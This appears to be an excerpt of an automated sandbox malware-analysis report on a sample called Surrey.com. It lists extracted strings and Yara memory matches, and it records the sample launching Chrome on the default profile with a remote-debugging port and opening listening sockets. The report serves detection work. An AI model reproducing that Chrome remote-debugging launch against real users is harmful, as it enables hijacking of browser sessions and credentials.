Source: Surrey.com.2.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Surrey.com Binary or memory string: WIN_XPe
Source: Surrey.com Binary or memory string: WIN_VISTA
Source: Surrey.com Binary or memory string: WIN_7
Source: Surrey.com Binary or memory string: WIN_8
Source: Yara match File source: Process Memory Space: Surrey.com PID: 2864, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 13.2.Surrey.com.43e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.3582252732.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2603391503.00000000043EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3585659448.00000000043E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2603286860.0000000001921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2603167258.000000000436E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Surrey.com PID: 2864, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009C2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 13_2_009C2263
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009C1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 13_2_009C1C61
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs